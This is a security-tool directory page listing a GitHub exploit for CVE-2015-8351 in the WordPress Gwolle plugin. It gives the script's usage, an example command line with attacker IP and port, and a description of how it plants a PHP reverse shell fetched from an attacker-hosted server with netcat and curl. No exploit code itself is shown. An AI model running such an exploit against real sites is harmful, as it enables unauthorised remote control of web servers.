Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/g01d3nw01f/cve-2015-8351
Payload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationPenetration Testing
GitHubg01d3nw01f/cve-2015-8351

CVE-2015-8351

this script is exploit for wordpress old plugin gwolle

View Repository
125 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

gwolle_buster

this script is exploit for wordpress old plugin gwolle

usage:

./gwolle_buster.py <target_url>

first arguments <target_url> => your target url of wordpress that installed gwolle second arguments => your ip third arguments => listening port for reverse shell

example: ./gwolle_buster.py http://vulnpress.com/ 192.168.1.5 1234

This Script will generate the php reverse shell script and bind the simple server, so you need open the 2 new terminal and listen the netcat at first terminal, and request with curl commands, however, commands are auto generate and appear at console, therefore you can copy and paste easily

Download Tool